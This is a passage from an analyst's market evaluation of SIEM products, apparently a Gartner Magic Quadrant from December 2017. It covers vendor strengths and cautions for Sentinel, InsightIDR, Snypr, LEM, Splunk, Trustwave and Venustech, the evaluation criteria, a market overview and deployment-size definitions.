Over the past 12 months, Micro Focus introduced Sentinel version 8 that includes an optional big data storage back end built on Cloudera Hadoop and Threat Response Dashboard. Other functional and operational enhancements were also added.

STRENGTHS
  • Sentinel Enterprise supports organizations that have large-scale deployment requirements underpinned by core SIEM capabilities, along with native workflow and automation capabilities.
  • Tight integration between Micro Focus’ IAM, SIEM and IT operations tools provides organizations with a single view into user activity across the IT environment.
  • Sentinel’s Hadoop-based log management tier provides flexible and horizontally scalable data collection, along with support for third-party solutions that can integrate with data from Hadoop platforms (e.g., UEBA tools).
  • Sentinel’s architecture is one of the simpler solutions to deploy and manage compared to competing products. Scaling and distribution-only require installation of more Sentinel instances.
CAUTIONS
  • The merger of Micro Focus and the software business from HPE resulted in ArcSight SIEM technology becoming part of Micro Focus. Users and prospective buyers should seek assurances from Micro Focus regarding roadmaps. Since closing the merger with HPE, Micro Focus has stated that its current plan is to continue investment in Sentinel and ArcSight, leveraging the combined expertise and technologies from both for the foreseeable future.
  • Advanced analytics in Sentinel are lagging compared to competing SIEM solutions. However, support for Hadoop-based event and data management should make integration with stand-alone UEBA solutions easier.
  • Support for log and event data collection and monitoring for SaaS, such as Office 365, Salesforce and Box, is lacking.
  • Integration of third-party solutions and content is provided, but the lack of an app store experience makes it less user-friendly than competitive products.
  • Micro Focus NetIQ Sentinel has low visibility with Gartner clients in competitive evaluations of SIEM platforms.

Rapid7

InsightIDR is Rapid7’s SIEM solution that is delivered as a service via the Insight platform. The solution consists of the InsightIDR service, EDR agents and honeypots. InsightIDR provides core SIEM features like log collection and management, threat detection rules and correlations, advanced analytics, dashboards, case management, and workflow and reporting. InsightIDR is built on Rapid7’s UserInsight (now InsightUBA) UEBA solution and the acquisition of Logentries. Advanced analytics with a focus on user behavior is a core component of InsightIDR. Buyers deploying the solution will need to install Collectors, available for Windows server or Linux and usually deployed in a ratio of one per location (physical and IaaS), to collect, aggregate and forward logs to the InsightIDR platform. The EDR agents also support local event log forwarding. Scalability is managed by Rapid7. Rapid7’s managed detection and response (MDR) service provides 24/7 SEM for buyers that require a service overlay. InsightIDR is licensed by annual subscriptions based on the number of monitored assets, which is any device connected to the buyer’s network that generates security data (e.g., desktops, laptops, tablets and servers). Data retention is 90 days, but extended data storage can be added for an additional charge.

STRENGTHS
  • InsightIDR is delivered as a service, thus the architecture and implementation is simplified. Ongoing maintenance of the platform (performance management, upgrades, scaling) is not required of the user as it’s fully managed by Rapid7.
  • Advanced analytics, particularly UEBA, is provided as part of the core solution.
  • Monitoring and responding to alerts is supported by the guided investigation feature, making it easier for less experienced users to leverage the solution.
  • EDR and honeypot technology are included with the price of the solution, allowing users to leverage advanced threat detection technologies along with InsightIDR.
CAUTIONS
  • InsightIDR is relatively new to the SIEM solution market and is less feature-rich compared with more mature SIEM solutions in areas such as reporting and the number of supported log event and data sources (but popular SaaS vendors are natively supported).
  • Workflow and case management is basic, and there is a lack of orchestration and response features. Rapid7 acquired an IT operations and security orchestration and automation company, Komand, in July 2017, which could address this gap in the future.
  • The as-a-service model may not meet the requirements of all buyers. There is no on-premises version of the solution available to buyers that have concerns about transmitting data and that data being stored off-premises. If network connectivity to Rapid7 is impaired, availability to the solution will be affected.

Securonix

Securonix’s SIEM platform is branded as Snypr Security Analytics and runs on top of a Hadoop big data platform. Snypr incorporates an event and data collection and management tier, advanced analytics that include native UEBA functionality as well as a threat library of traditional signatures and rules, and case management and workflow functions. Snypr components include the Console, which provides the UI and configuration functions; Search Service for indexing and searching across all stored data; Enrichment Service for handling data parsing, normalization and event enrichment; Correlation Service for correlation rules; Behavior Science for ML analytics; Risk Scoring Service for threat modeling and indicator-based analytics; Storage Service; Indexing Service; Centralized Ingestion Service; and Ingesters for collecting and forwarding data to the Centralized Ingestion Service. Premium apps include prepackaged behavior models, rules, reports and dashboards across a variety of security monitoring use cases, such as privileged account misuses, data security, cyberthreats, access, application security, cloud security and fraud. Advanced incident investigation and threat hunting requirements are supported by Securonix’s Spotter capability. Snypr can be deployed in a variety of ways, including software only that includes the Hadoop environment, or as software that can use a buyer’s existing Hadoop environment. For faster implementations, both physical appliance and hosted as-a-service options are available. Securonix licenses the solution as a term model based on the number of users in an organization for Snypr, premium content apps.

Over the past 12 months, Securonix added improvements around SEM, such as use-case-specific packaged content; enhancements in dashboard features and functionality that help address compliance-, threat- and operational-driven uses; the Securonix Threat Model Exchange for users to share use-case content from a central community-driven location; and the introduction of an as-a-service option.

STRENGTHS
  • Securonix Snypr provides both rule-based and UEBA capabilities as part of the core platform.
  • The Securonix licensing model is straightforward and easy for buyers to understand.
  • Securonix has a large set of partners and supports a wide variety of third-party solutions out of the box, including endpoint protection platforms, data loss prevention, cloud access security brokers, firewalls, healthcare solutions and access management solutions.
CAUTIONS
  • Native workflow and case management is relatively basic. More advanced orchestration and automation capabilities are available through API connection. Integrations with third-party solutions, such as ServiceNow, Jira and Remedy service desk solutions, are supported, as well as SOAR solutions like Microsoft-Hexadite and Phantom.
  • Since Snypr runs on a commercial Hadoop platform, it introduces a different architecture compared to more traditional SIEM solutions, and may require a learning curve to understand how to manage, monitor and troubleshoot the various components running on the platform (e.g., Kafka, Solr, HBase, Spark, HDFS, etc.)
  • Securonix lacks native advanced threat defense solutions, relying on integrations with third-party solutions for those functions (e.g., host and network forensics).

SolarWinds

SolarWinds Log & Event Manager (LEM) provides SEM and SIM functionality delivered as a virtual appliance for VMware and Hyper-V platforms. SolarWinds LEM is composed of Manager, which provides central management of the overall solution as well as log and event management and storage; Console, which provides the user interface; and Agents. The LEM Agents provide real-time event collection from endpoints, handle encryption and compression of data sent to the Manager, and also provide basic DLP (called USB Defender), FIM and automated, active response capabilities. Support for other security monitoring and context sources, such as network traffic, application and virtualized platform monitoring, is available through other SolarWinds solutions such as Virtualization Manager, Network Performance Monitor, and Server & Application Monitor. SolarWinds LEM is licensed per number of event source nodes and includes all components, including Agents and threat intelligence feeds.

Over the past 12 months, SolarWinds added multifactor authentication to the Console, along with feature and functionality upgrades for new device and application event sources. The vendor also improved capabilities for monitoring LEM health through other SolarWinds applications.

STRENGTHS
  • SolarWinds LEM provides a well-integrated solution across a variety of IT operation capabilities, making it a good option for SMBs where security operations responsibilities are federated across IT teams and staff.
  • LEM supports a variety of event sources, including nonevent data sources that can be integrated into its analytics and correlation rules.
  • SolarWinds’ simple architecture, easy licensing, and robust out-of-the-box content and features — some found in more complex SIEM solutions — make it a good fit for SMB security operations and compliance use cases.
  • The automated response capability based on the endpoint agent for Windows provides some threat containment and quarantine control capabilities not normally found with many competing SIEM solutions.
  • SolarWinds has moderate visibility with Gartner clients, particularly midsize and smaller enterprise clients.
CAUTIONS
  • SolarWinds LEM is a closed ecosystem, limiting the ability to integrate it with third-party security solutions, particularly advanced threat detection, threat intelligence feeds and UEBA tools. Integrations with service desk tools are also limited to one-way connectivity via email and SNMP.
  • LEM’s architecture scales horizontally to support thousands of nodes, but it doesn’t scale vertically and has an event data storage limit, which the vendor plans to address in a future release.
  • Monitoring of SaaS is not supported, and monitoring of IaaS is limited. Buyers that wish to extend monitoring to networks and applications must purchase other SolarWinds solutions to address those requirements.

Splunk

Splunk’s Security Intelligence Platform is composed of Splunk Enterprise and two premium solutions, Enterprise Security (ES) and Splunk User Behavior Analytics (UBA). Splunk Enterprise is the core component of the product, providing event and data collection, a variety of analytics capabilities, search, and visualizations. Splunk Enterprise (aka Core Splunk) and Splunk Cloud provide use-case-agnostic data analysis capabilities that are used for various purposes like IT operations, application and network performance monitoring, business intelligence, and some security use cases. The premium ES solution delivers most of the security-monitoring-specific capabilities, including prepackaged security-specific queries, visualizations and dashboards, as well as case management, workflow and incident response capabilities. UBA adds machine-driven, advanced analytics that complement the query-oriented approach of ES. Splunk offers a variety of complementary apps for security use cases, made available through Splunkbase. Example apps include App for PCI Compliance; Stream, which ingests network packet data directly off the wire; Analytics for Hadoop (formerly Hunk), which integrates Splunk with Hadoop environments; and Machine Learning Toolkit for users that want to create their own ML-driven analytics. Splunk supports a variety of deployment options, such as software that can be run on-premises, in IaaS and as a hybrid model. Splunk Cloud is a Splunk-hosted and -operated SaaS solution using AWS infrastructure. Core Splunk and Splunk Cloud components consist of Universal Forwarders, Indexers and Search Heads supporting n-tier architectures, as well as multiple use cases and premium solutions. Splunk is licensed based on the amount of data ingested into the platform, measured in gigabytes per day. ES is also licensed by gigabytes per day, whereas UBA is licensed by the number of user accounts in an organization, and all these are available either as a perpetual or term license.

Over the past 12 months, Splunk has primarily delivered a variety of performance and usability enhancements to Core, ES and UBA. Splunk introduced a new open-visualization approach and the Machine Learning Toolkit app that supports user-generated, machine-based analytics. Support for Okta, Azure AD and ADFS was added. Enhancements were also made to the incident response features in ES (called Adaptive Response), further enabling orchestration and automated response capabilities. Improved integration between ES and UBA events, alerts and identity resolution were also added.

STRENGTHS
  • Splunk provides a full suite of solutions oriented toward SEM that allow users to grow into the platform over time (e.g., starting with Core, then adding ES and UBA).
  • Advanced analytics capabilities are available through a variety of means across the Splunk ecosystem (e.g., built into the core search capabilities, with Machine Learning Toolkit, prepackaged in UBA or via third-party app providers).
  • Splunk has a large partner ecosystem that provides integration and Splunk-specific content that is made available through the Splunkbase application store.
  • Many organizations start implementing Splunk for other use cases, easing the path for security teams looking to add a SIEM solution to their environment as the core infrastructure and event log sources are already in place.
  • Splunk has significant visibility with Gartner clients, consistently appearing on buyers’ shortlists.
CAUTIONS
  • Gartner clients that have implemented Splunk consistently raise concerns about the licensing model and overall cost to implement the solution. Splunk has introduced new licensing approaches, such as the Enterprise Adoption Agreement (EAA) as well as additional license headroom for new users with periodic license true-ups, to address these concerns.
  • Splunk UBA is visible on shortlists of Splunk users seeking to add UEBA features, but competes with other UEBA solutions, some of which also offer SIEM functionality. Buyers considering using Splunk for SIEM and a third-party solution for UEBA must validate the degree of integration of the solutions and assess the commitment of the respective vendors to continued integration.
  • Splunk does not offer an appliance version of the solution. Organizations that want an on-premises appliance version must work with a Splunk partner that provides the integration on supported hardware.

Trustwave

Trustwave’s SIEM solution is composed of two versions — SIEM Enterprise and Log Management Enterprise (LME). Both products complement their broader security solution offerings across network, endpoint, and content and data security. Customers consuming SIEM Enterprise as a service leverage the local collector appliance (LCA). The SIEM Enterprise solution is composed of the following components: DA or LCA for event and data collection and normalization; Threat Detection and Threat Evaluation (TD&TE) for real-time analytics and alerting; and the Secure Data Warehouse (SDW) for data storage and historical analysis. SIEM Enterprise, LME and LCA can be deployed as physical or virtual appliances. The architecture can run as an all-in-one solution, and can scale both horizontally and vertically across on-premises and IaaS environments (e.g., a hybrid approach). Trustwave offers a variety of co-managed or hybrid, services augmenting its security management products. Trustwave’s licensing is primarily based on appliance costs and velocity of events processed per day (EPD). Services are charged for based on the size of the SIEM environment, and number and types of event sources.

Over the past 12 months, Trustwave has made additions and enhancements to the core platform, primarily around event collection and parsing; connectivity to cloud-based services; added support for deployment in AWS, Azure and CenturyLink; and improved storage capabilities and security.

STRENGTHS
  • Trustwave has built integrations across its security product portfolio, making its SIEM a viable option for customers of other Trustwave security products.
  • Trustwave offers flexible deployment and service options, including co-management and hybrid deployments, which is a good fit for midmarket organizations and buyers with diverse IT environments (across geographies, on-premises and IaaS).
  • SIEM Enterprise has good out-of-the-box support for event and data sources, as well as reports across a variety of regulatory and security frameworks.
  • SIEM Enterprise provides core SEM and SIM capabilities that can support both small environments and large organizations and MSSPs requiring multitenant support.
  • Midmarket customers can adopt LME and then grow into SIEM Enterprise via a simple license key upgrade.
CAUTIONS
  • Trustwave SIEM Enterprise lags the competition in integration with third-party security solutions. The addition of RESTful API support, which Trustwave added this year, should make this easier in the future.
  • SIEM Enterprise lacks advanced analytics and user-behavior-based analytics, as well as integration with big data solutions and stand-alone UEBA solutions.
  • Threat intelligence feeds are not provided out of the box. Buyers must add on Trustwave SpiderLabs research team feeds as a premium. Native SIEM integration with third-party threat intelligence feeds is not directly supported.
  • Trustwave has little visibility in competitive evaluations of SIEM solutions among Gartner clients.

Venustech

The Venustech SIEM solution is composed of various components under the Venusense Unified Security Management (USM) product, which includes modules for Security Analytics (SA), Network Behavior Analysis (NBA), Configuration Verification System (CVS) and Business Security Management (BSM). Venusense SA provides log collection, normalization and storage, and an analytics engine for threat detection and compliance use cases. It is based on a big data platform, with both Hadoop and Elasticsearch options available, that enables ML analytics in addition to standard correlation-based detection. The solution can be deployed via software, or as a virtual or physical appliance (the NBA solution is only available as a physical appliance). Venustech also offers a variety of security technologies in addition to its SIEM solution, focused on the Chinese and Asia/Pacific region markets, with solutions that cover firewalls and UTMs, web application firewalls, intrusion detection, vulnerability scanning, VPN, and other products. The solution is licensed by the core product version (back-end data tier), number of data source nodes and add-on functional modules.

Over the past year, Venustech introduced a number of new capabilities and enhancements, including its big data architecture and new UI based on HTML5, support for OT/ICS environments, and a new version of its NBA tool.

STRENGTHS
  • Venustech is a good solution for Chinese organizations, both midsize and enterprise-sized, and buyers in the Asia/Pacific markets where Venustech’s security solutions are used. Both Chinese and English are supported out of the box.
  • Venustech’s SIEM solution provides core SEM and SIM functionality that can be expanded to address a variety of network-based monitoring, as well as other security operations and risk management capabilities.
  • The Venustech SIEM architecture is straightforward and offers flexible, horizontal scaling.
  • Venustech’s SIEM solution provides a variety of data management tiers to fit different buyer types (e.g., midsize versus large enterprises).
  • Advanced analytics using ML for modeling network-based entity behavior is provided out of the box.
CAUTIONS
  • Venustech’s SIEM solution lacks the ability to monitor IaaS and SaaS solutions popular outside of the Chinese market, such as AWS, Azure, Office 365, Box and Salesforce. Support is provided for Alibaba Cloud and Tencent Cloud environments.
  • Venustech offers three versions of data management to support small- to large-scale deployments. Potential customers must understand the use cases and data volumes they need to support in order to choose the appropriate data management architecture.
  • The number of out-of-the-box parsers and report templates, especially regulatory reports outside those needed by Chinese organizations, is fewer than competing SIEM solutions.
  • Venustech has little visibility with Gartner clients, including those in the Asia/Pacific region, relative to other competing SIEM solutions.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

  • Exabeam
  • FireEye
  • Rapid7
  • Securonix
  • Venustech

Dropped

No vendors were dropped from this Magic Quadrant.

Inclusion and Exclusion Criteria

The inclusion criteria represent the specific attributes that analysts believe are necessary for inclusion in this research.

To qualify for inclusion:

  • The product must be generally available and provide SIM and SEM capabilities.
  • The product must support data capture from heterogeneous data sources, including network devices, security devices, security programs and servers.
  • The vendor must appear on the SIEM product evaluation lists of end-user organizations.
  • The solution must be delivered to the customer environment as a software- or appliance-based product or in an as-a-service model.
  • SIEM revenue (net-new license revenue plus maintenance) must be at least $15 million for 2016.

Evaluation Criteria

Ability to Execute

  • Product or Service evaluates the vendor’s ability and track record to provide product functions in areas such as real-time security monitoring, security analytics, incident management and response, reporting, and deployment simplicity.
  • Overall Viability includes an assessment of the technology provider’s financial health, the financial and practical success of the overall company, and the likelihood that the technology provider will continue to invest in SIEM technology.
  • Sales Execution/Pricing evaluates the technology provider’s success in the SIEM market and its capabilities in presales activities. This includes SIEM revenue and the installed base size, growth rates for SIEM revenue and the installed base, presales support, and the overall effectiveness of the sales channel. The level of interest from Gartner clients is also considered.
  • Market Responsiveness/Record evaluates the match of the SIEM offering to the functional requirements stated by buyers at acquisition time, and the vendor’s track record in delivering new functions when they are needed by the market. Also considered is how the vendor differentiates its offerings from those of its major competitors.
  • Marketing Execution evaluates the SIEM marketing message against our understanding of customer needs, and also evaluates any variations by industry vertical or geographic segments.
  • Customer Experience is an evaluation of product function and service experience within production environments. The evaluation includes ease of deployment, operation, administration, stability, scalability and vendor support capabilities. This criterion is assessed by conducting surveys of vendor-provided reference customers, in combination with feedback via inquiry, Peer Insights and other interactions from Gartner clients that are using or have completed competitive evaluations of the SIEM offering.
  • Operations is an evaluation of the organization’s service, support and sales capabilities, and includes an evaluation of these capabilities across multiple geographies
Table 1.   Ability to Execute Evaluation Criteria

Evaluation Criteria

Weighting

Product or Service

High

Overall Viability

High

Sales Execution/Pricing

High

Market Responsiveness/Record

High

Marketing Execution

Medium

Customer Experience

High

Operations

High

Source: Gartner (December 2017)

Completeness of Vision

  • Market Understanding evaluates the ability of the technology provider to understand current and emerging buyer needs and to translate those needs into products and services. SIEM vendors that show the highest degree of market understanding are adapting to customer requirements in areas such as early targeted attack and breach detection, and simplified implementation and operation, while also meeting compliance reporting requirements.
  • Marketing Strategy evaluates the vendor’s ability to effectively communicate the value and competitive differentiation of its SIEM offering.
  • Sales Strategy evaluates the vendor’s use of direct and indirect sales, marketing, service, and communications affiliates to extend the scope and depth of market reach.
  • Offering (Product) Strategy is an evaluation of the vendor’s approach to product development and delivery that emphasizes functionality and feature sets as they map to current requirements. Development plans during the next 12 to 18 months are also evaluated. Because the SIEM market is mature, there is little differentiation between most vendors in areas such as support for common network devices, security devices, OSs and consolidated administration capabilities. In this evaluation, we neutralized the relative evaluations of vendors with capabilities in these areas, but there would be a severe “vision penalty” (that is, a lower rating on the Completeness of Vision axis) for a vendor that has shortcomings in this area. We continue to place greater weight on current capabilities that aid in targeted attack detection, including:
    • Vendor capabilities for profiling and anomaly detection to complement existing rule-based correlation.
    • Threat intelligence and business context integration, including automated updates, filtering, and usage within rules, alerts and reports.
    • User monitoring capabilities, including monitoring of administrative policy changes and integration with IAM technologies, for automated import of access policy (user context) for use in monitoring. We also evaluate predefined analytics for user behavior analysis.
    • Data access monitoring capabilities, which include direct monitoring of database logs and integration with database audit and protection products, DLP integration, and FIM through native capability and integration with third-party products.
    • Application layer monitoring capabilities, including integration with third-party applications (for example, ERP financial and HR applications, and industry vertical applications), for the purpose of user activity and transaction monitoring at that layer; the external event source integration interface that is used to define normalizers and parsers for the log formats of an organization’s in-house-developed applications; and the ability to derive application context from external sources.
    • Analytics, an important capability to support the early detection of targeted attacks and breaches. SIEM vendors have long provided query capabilities against the primary storage tiers of SIEM technology. In order to be effective for early breach detection, the analytics capability must incorporate context about users, assets, threats and network activity, and must also provide query performance that supports an iterative approach to investigation. Some SIEM vendors have introduced separate data stores to hold very large amounts of security event, content and contextual data, optimized for applying advanced analytics. A number of SIEM vendors have also built connectors from the SIEM technology to industry-standard big data repositories.
    • Inclusion of advanced threat detection, endpoint and network traffic monitoring, and packet capture capabilities, and integration with third-party technologies that provide these functions for more effective early breach detection.
  • Despite the vendor focus on expansion of capability, we continue to heavily weight simplicity of deployment and ongoing support. Users, especially those with limited IT and security resources, still value this attribute over breadth of coverage beyond basic use cases. SIEM products are complex and tend to become more so as vendors extend capabilities. Vendors that are able to provide effective products that users can successfully deploy, configure and manage with limited resources will be the most successful in the market.
  • We evaluate options for co-managed or hybrid deployments of SIEM technology and supporting services because a growing number of Gartner clients are anticipating or requesting ongoing service support for monitoring or managing their SIEM technology deployments.
  • Vertical/Industry Strategy evaluates vendor strategies to support SIEM requirements that are specific to industry verticals.
  • Innovation evaluates the vendor’s development and delivery of SIEM technology that is differentiated from the competition in a way that uniquely meets critical customer requirements. Product capabilities and customer use in areas such as application layer monitoring, fraud detection and identity-oriented monitoring are evaluated, in addition to other capabilities that are product-specific and needed and deployed by customers. There is a strong weighting of capabilities that are needed for advanced threat detection and incident response: user, data and application monitoring, ad hoc queries, visualization, orchestration and incorporation of context to investigate incidents, and workflow/case management features. There is also an evaluation of capabilities for monitoring cloud environments.
  • For Geographic Strategy, although the North American and European markets produce the most SIEM revenue, Latin America and the Asia/Pacific region are growth markets for SIEM and are driven primarily by threat management and secondarily by compliance requirements. Our overall evaluation of vendors in this Magic Quadrant includes an evaluation of vendor sales and support strategies for those geographies.
Table 2.   Completeness of Vision Evaluation Criteria

Evaluation Criteria

Weighting

Market Understanding

High

Marketing Strategy

Medium

Sales Strategy

Medium

Offering (Product) Strategy

High

Business Model

Not Rated

Vertical/Industry Strategy

Medium

Innovation

High

Geographic Strategy

Medium

Source: Gartner (December 2017)

Quadrant Descriptions

Leaders

The SIEM Leaders quadrant is composed of vendors that provide products that are a strong functional match to general market requirements, have been the most successful in building an installed base and revenue stream within the SIEM market, and have a relatively high viability rating (due to SIEM revenue or SIEM revenue in combination with revenue from other sources). In addition to providing technology that is a good match to current customer requirements, Leaders also show evidence of superior vision and execution for emerging and anticipated requirements. They typically have relatively high market share and/or strong revenue growth, and have demonstrated positive customer feedback for effective SIEM capabilities and related service and support.

Challengers

The Challengers quadrant is composed of vendors that have multiple product and/or service lines, at least a modest-size SIEM customer base, and products that meet a subset of the general market requirements. As the SIEM market continues to mature, the number of Challengers has dwindled. Vendors in this quadrant would typically have strong execution capabilities, as evidenced by financial resources, a significant sales and brand presence garnered from the company as a whole, or from other factors. However, Challengers have not demonstrated a complete set of SIEM capabilities or they lack the track record for competitive success with their SIEM technologies, compared with vendors in the Leaders quadrant.

Visionaries

The Visionaries quadrant is composed of vendors that provide products that are a strong functional match to general SIEM market requirements, but have a lower Ability to Execute rating than the Leaders. This lower rating is typically due to a smaller presence in the SIEM market than the Leaders, as measured by installed base or revenue size or growth, or by smaller overall company size or general viability.

Niche Players

The Niche Players quadrant is composed primarily of vendors that provide SIEM technology that is a good match to a specific SIEM use case or a subset of SIEM functional requirements. Niche Players focus on a particular segment of the client base (such as the midmarket, service providers, or a specific geographic region or industry vertical) or may provide a more limited set of SIEM capabilities. In addition, vendors in this quadrant may have a small installed base or be limited, according to Gartner’s criteria, by a number of factors. These factors may include limited investments or capabilities, a geographically limited footprint, or other inhibitors to providing a broader set of capabilities to enterprises now and during the 12-month planning horizon. Inclusion in this quadrant does not reflect negatively on the vendor’s value in more narrowly focused markets or use cases.

Context

SIEM technology provides:

  • SIM — Log management, analytics and compliance reporting
  • SEM — Real-time monitoring and incident management for security-related events from networks, security devices, systems and applications

SIEM technology is typically deployed to support three primary use cases:

  • Advanced threat detection — Monitoring, alerting in real time, and longer-term analysis and reporting of trends and behaviors regarding user activity, data access, and application activity. Threat detection includes incorporation of threat intelligence and business context, in combination with effective ad hoc query capabilities.
  • Basic security monitoring — Log management, compliance reporting and basic real-time monitoring of selected security controls.
  • Investigation and incident response — Dashboards and visualization capabilities, as well as workflow and documentation support to enable effective incident identification, investigation and response.

Organizations should define their specific functional and operational requirements, and consider SIEM products from vendors in every quadrant of this Magic Quadrant. Product selection decisions should be driven by organization-specific requirements in areas such as the relative importance of basic capabilities versus advanced features; budget constraints; the scale of the deployment; complexity of product (deploying, running, using and supporting); the IT organization’s project deployment and technology support capabilities; and integration with established applications, data monitoring and identity management infrastructure (see “Toolkit: Security Information and Event Management RFP” ).

Security and risk management leaders considering SIEM deployments should first define the requirements for SEM and reporting. The requirements definition should include capabilities that will be needed for subsequent deployment phases. The project will benefit from the input of other groups, including audit/compliance, identity administration, IT operations and application owners (see “How to Deploy SIEM Technology” ). Organizations should also describe their network and system deployment topology, and assess event rates, so that prospective SIEM vendors can propose solutions for company-specific deployment scenarios. The requirements definition effort should also include phased deployments and enhancements beyond the initial use cases. This Magic Quadrant evaluates technology providers with respect to the most common technology selection scenario — a SIEM project that is funded to satisfy a combination of threat monitoring/detection/response and compliance reporting requirements.

Market Overview

During the past year, demand for SIEM technology has remained strong. The SIEM market grew from $2.001 billion in 2015 to $2.167 billion in 2016 (see “Forecast: Information Security, Worldwide, 2015-2021, 3Q17 Update” ). Threat management is now the primary driver, and general monitoring and compliance remains secondary. In North America, there continue to be many new deployments by organizations with limited security resources that need to improve monitoring and breach detection — often at the insistence of larger customers or business partners. Compliance reporting also continues as a requirement, but most discussions with Gartner clients are security-focused, and compliance reporting is regarded as “table stakes.” Demand for SIEM technology in Europe and the Asia/Pacific region remains steady, driven by a combination of threat management and compliance requirements. Growth rates in the less mature markets of the Asia/Pacific region and Latin America are much higher than those in the more mature North American and European markets. As a consequence, our overall evaluation of vendors in this Magic Quadrant includes an evaluation of vendor sales and support strategies for those geographies.

There continue to be new deployments by larger companies that are conservative adopters of technology. Large, late adopters and smaller organizations place high value on deployment and operational support simplicity. We continue to see large companies that are re-evaluating SIEM vendors to replace SIEM technology associated with incomplete, marginal or failed deployments.

The SIEM market is mature and very competitive. We are in a broad adoption phase, in which multiple vendors can meet the basic requirements of a typical customer. The greatest area of unmet need is effective detection of targeted attacks and breaches. Organizations are failing at early breach detection, with more than 80% of breaches undetected by the breached organization. The situation can be improved with threat intelligence, behavior profiling and effective analytics. SIEM vendors continue to increase their native support for behavior analysis capabilities as well as integrations with third-party technologies, and Gartner customers are increasingly expressing interest in developing use cases based on behavior.

SIEM deployments tend to grow in scope over a three-year period to include more use cases, and more event sources. As the number and complexity of use cases increases, there is typically greater demand for resources to run, tune and operate the SIEM, and to respond to incidents.

SIEM Vendor Landscape

The vendor landscape for SIEM is evolving, with several new entrants to the Magic Quadrant this year. Exabeam, FireEye, Rapid7, Securonix and Venustech have been added, as these vendors have added support for SIEM functions, and compete for SIEM budget with other vendors in the Magic Quadrant. Venustech is based in China, with aims of expansion into Europe. Exabeam and Securonix have added SIEM functionality to their previously UEBA-focused products, and FireEye has evolved to add SIEM as a service to its advanced threat detection platform. The SIEM market continues to be dominated by relatively few large vendors — Micro Focus (including the ArcSight and Sentinel SIEMs) IBM, McAfee (previously Intel Security) and Splunk — that command more than 60% of market revenue. Smaller SIEM vendors are typically focused on specific market segments, such as buyers of their other products, buyers seeking SIEM plus monitoring services, or MSSP or MSP providers.

Leading SIEM vendors continue to focus on targeted attack and breach detection through incorporation of threat intelligence, analytics, profiling and anomaly detection, and endpoint and network activity monitoring.

Leading SIEMs have integrations with big data platforms (the vendors’ own, where they have them or open-source options like Hadoop). A number of vendors with in-house security research capabilities (IBM, McAfee, RSA and Trustwave) provide integration with proprietary threat intelligence content. Vendors that have both SIEM and MSSP businesses (EventTracker, IBM and Trustwave) are marketing co-managed SIEM technology deployments that include a range of monitoring services. Rapid7 and FireEye offer as-a-service SIEM.

Customer’s adopting SIEM solutions that have emerged from UEBA vendors need to plan for changes to the way analysts use the tools. The tools primarily emphasize a user-based approach to monitoring for threats, compared to traditional approaches of event-based monitoring oriented around IP addresses and hostnames. SIEM solutions delivered entirely on big data platforms are just emerging in the market and buyers should consider the potential operational impacts and expertise requirements as these platforms are more complex and newer than other SIEM solutions.

Several vendors are not included in the Magic Quadrant because of a specific vertical-market focus and/or SIEM revenue and competitive visibility levels:

  • Odyssey Consultants, based in Cyprus, and LogPoint, based in Denmark, offer SIEMs based on modern, big data and analytics architectures, but currently have very limited visibility among Gartner customers.
  • FairWarning provides privacy breach detection and prevention solutions for the healthcare market that entail user activity and resource access monitoring at the application layer, and has expanded to include security monitoring for Salesforce.
  • Huntsman Security (part of Tier-3) is a SIEM vendor with a presence primarily in the U.K. and Australia. The Huntsman Enterprise SIEM can be augmented with modules to support behavioral anomaly detection and threat intelligence.
  • Lookwise (developed by S21sec) has a market presence primarily in Spain and South America. The distinguishing characteristic of Lookwise is the threat intelligence feeds from S21sec, which are focused on the banking and critical infrastructure sectors.
  • HelpSystems, with its Vityl product suite, provides operational event correlation, business process monitoring and SIEM solutions to customers in Europe and South America.

Customer Requirements — Security Monitoring and Compliance Reporting for Systems, Users, Data and Applications

Customers remain primarily focused on security use cases for SIEM, with compliance typically a secondary requirement. The security organization often wants to employ SIEM to improve capabilities for external and internal threat discovery and incident management (see “Use SIEM for Targeted Attack Detection” ). As a consequence, there are requirements for user activity and resource access monitoring for host systems and applications (see “Effective Security Monitoring Requires Context” ). In this year’s Magic Quadrant, we continue to place greater weight on capabilities that aid in targeted attack detection, including support for user activity monitoring, application activity monitoring, profiling and anomaly detection, threat intelligence, and effective analytics, as well as on incident response features.

The ongoing consideration of SIEM technology by companies with limited security resources results in demand for products that are easy to deploy and manage and that provide security monitoring content such as correlation rules, queries, dashboards, reports, threat feeds that support basic security monitoring and compliance reporting functions.

SIEM solutions should:

  • Support the real-time collection and analysis of events from host systems, security devices and network devices, combined with contextual information for threats, users, assets and data.
  • Provide long-term event and context data storage and analytics.
  • Provide predefined functions that can be lightly customized to meet company-specific requirements.
  • Be as easy as possible to deploy and maintain.

Scalability

Scalability is a major consideration in SIEM deployments. For a SIEM technology to meet the requirements for a given deployment, it must be able to collect, process, normalize, store and analyze all security-relevant events and other context-relevant data. Minimal latency is necessary for real-time correlation and alerting. Event processing includes parsing, filtering, aggregation, correlation, enrichment, alerting, display, indexing and writing to the data store. Scalability also includes access to the data for analytics and reporting — even during peak event periods — with ad hoc query response times that enable an iterative approach for incident investigation. Behavioral and analytics require the collection and analysis of data over longer time periods than typically used for real-time alerting. We characterize the size of a deployment based on three principal factors:

  • The number of event sources
  • The sustained events collected per second
  • The size of the event data store

We assume a mix of event sources that are dominated by servers, but also include firewalls, intrusion detection sensors and network devices. The boundaries for small, midsize and large deployments are not absolute, because some deployments may have a large number of relatively quiet event sources, while others will have a smaller number of very busy event sources. For example, a deployment with several busy log sources may exceed the EPS boundary for a small deployment, but will still be small architecturally.

Gartner defines a small deployment as one with 300 or fewer event sources, a sustained EPS rate of 1,500 EPS or less, and a back store sized at 800GB or less. Gartner defines a midsize deployment as one with 400 to 800 event sources, a sustained event rate of 2,000 to 7,000 EPS and a back store of 4TB to 8TB. A large deployment is defined as one with more than 900 event sources, a sustained event rate of more than 15,000 EPS, and a back store of 10TB or more. Some very large deployments have many thousands of event sources, sustained event rates of more than 25,000 EPS and a back store of more than 50TB. We may indicate that a vendor’s SIEM technology is better-suited for a small, midsize or large deployment, which means that the size is a typical or most common successful deployment for that vendor. Every vendor will have outliers.

SIEM Services

